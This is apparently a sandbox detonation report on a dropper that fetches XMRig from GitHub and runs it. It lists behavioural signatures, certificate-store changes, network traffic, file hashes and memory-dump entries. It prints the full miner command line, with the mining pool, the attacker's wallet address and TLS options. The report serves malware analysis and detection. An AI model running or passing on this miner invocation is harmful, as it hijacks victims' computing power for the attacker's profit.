Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\svchost.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1140 wrote to memory of 872 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1140 wrote to memory of 872 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4800 --field-trial-handle=2292,i,2103142837140538807,15881446839139365070,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5044 --field-trial-handle=2292,i,2103142837140538807,15881446839139365070,262144 --variations-seed-version /prefetch:8
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 13.107.253.64:443 | tcp | |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 216.58.212.234:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 234.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.193.132.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| BE | 2.21.17.194:80 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.17.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.32.209.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.93.73.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.17.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.135.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/872-16-0x0000028F95A40000-0x0000028F95A60000-memory.dmp
memory/872-17-0x0000028F95A90000-0x0000028F95AB0000-memory.dmp
memory/872-18-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-19-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-21-0x0000028F97280000-0x0000028F972A0000-memory.dmp
memory/872-20-0x0000028F97260000-0x0000028F97280000-memory.dmp
memory/872-22-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-23-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-24-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-25-0x0000028F97260000-0x0000028F97280000-memory.dmp
memory/872-26-0x0000028F97280000-0x0000028F972A0000-memory.dmp
memory/872-27-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-28-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-29-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-30-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-31-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-32-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-33-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-34-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-35-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-36-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-37-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-38-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-39-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-40-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-41-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-42-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-43-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-44-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-45-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-46-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-47-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-48-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-49-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-50-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-51-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-52-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-53-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-54-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-55-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-56-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-57-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-58-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-59-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-60-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-61-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-62-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-63-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-64-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-65-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-66-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-67-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-68-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-69-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-70-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-71-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-72-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-73-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-74-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-75-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-76-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-77-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-78-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-79-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-80-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-81-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-82-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-83-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
memory/872-84-0x00007FF68B140000-0x00007FF68BC43000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 20:01
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1797s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1240 wrote to memory of 2748 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1240 wrote to memory of 2748 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.197.79.40.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2748-16-0x000001899D310000-0x000001899D330000-memory.dmp
memory/2748-17-0x000001899EB20000-0x000001899EB40000-memory.dmp
memory/2748-18-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-20-0x000001899EB40000-0x000001899EB60000-memory.dmp
memory/2748-19-0x000001899EB60000-0x000001899EB80000-memory.dmp
memory/2748-21-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-22-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-25-0x000001899EB40000-0x000001899EB60000-memory.dmp
memory/2748-24-0x000001899EB60000-0x000001899EB80000-memory.dmp
memory/2748-23-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-26-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-27-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-28-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-29-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-30-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-31-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-32-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-33-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-34-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-35-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-36-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-37-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-38-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-39-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-40-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-41-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-42-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-43-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-44-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-45-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-46-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-47-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-48-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-49-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-50-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-51-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-52-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-53-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-54-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-55-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-56-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-57-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-58-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-59-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-60-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-61-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-62-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-63-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-64-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-65-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-66-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-67-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-68-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-69-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-70-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-71-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-72-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-73-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-74-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-75-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
memory/2748-76-0x00007FF78DEF0000-0x00007FF78E9F3000-memory.dmp
